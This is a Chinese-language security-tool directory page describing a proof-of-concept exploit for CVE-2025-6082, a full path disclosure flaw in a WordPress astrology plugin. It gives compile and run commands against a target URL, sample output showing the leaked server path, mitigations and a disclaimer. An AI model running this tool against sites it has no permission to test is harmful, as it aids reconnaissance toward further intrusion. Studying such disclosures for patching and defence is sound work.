Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6082 — 概念验证利用“Birth Chart Compatibility”WordPress 插件(<=v2.0)中的完整路径泄露漏洞。 | Kitploit
工具/GitHubGitHub/bytereaper77/cve-2025-6082
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试Archived
GitHubbytereaper77/cve-2025-6082

CVE-2025-6082

概念验证利用“Birth Chart Compatibility”WordPress 插件(<=v2.0)中的完整路径泄露漏洞。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-6082 全路径泄露 PoC

作者: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
漏洞: 全路径泄露 (CWE-200)

描述

本概念验证利用 Birth Chart Compatibility WordPress 插件(版本 ≤ 2.0)中的全路径泄露漏洞。PoC 向插件的 index.php 端点发送 HTTP GET 请求,捕获任何 PHP 警告或致命错误,并解析出服务器的文件系统路径(例如 /var/www/html/wp-content/plugins/... 或 C:\xampp\htdocs\...)。
泄露完整路径有助于攻击者进一步实施本地文件包含(LFI)、远程代码执行(RCE)或其他侦察攻击。

要求

  • Linux
  • gcc 或兼容的 C 编译器
  • libcurl 开发头文件
  • argparse.c / argparse.h

编译

root@kitploit:~
gcc -o fpd-poc exploit.c argparse.c  -lcurl

使用

./fpd-poc -u https://target.com [选项]

选项:

Flag Description

-u, --url (必需)目标 WordPress 站点的基 URL

-c, --cookies 使用来自 FILE 的 Cookie(可选)

-v, --verbose 启用详细的 curl 输出

-f, --loop 重复请求 N 次(例如 -f 10)

-h, --help 显示此帮助信息

示例:

单次检查

./fpd-poc -u https://victim.com

详细模式,重复检查 5 次

./fpd-poc -u https://victim.com -v -f 5 样本输出:

[+] Request sent successfully

[+] Input Url : https://victim.com

[+] Full Format Url: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php

[+] Http Code : 200

====================================[Response]====================================

Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...

[+] Response Len : 256

[+] Keyword found: Warning:

[+] Context: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php

缓解措施

一旦发布,立即将“Birth Chart Compatibility”插件更新到补丁版本(> 2.0)。

如果不需要,请禁用或删除该插件。

通过 Web 服务器配置(例如通过 .htaccess 或 Nginx 规则)拒绝直接访问插件 PHP 文件(index.php)。

免责声明 此代码仅供教育和测试目的使用。未经授权对您不拥有或未获得明确许可的系统进行测试可能是非法的。

下载工具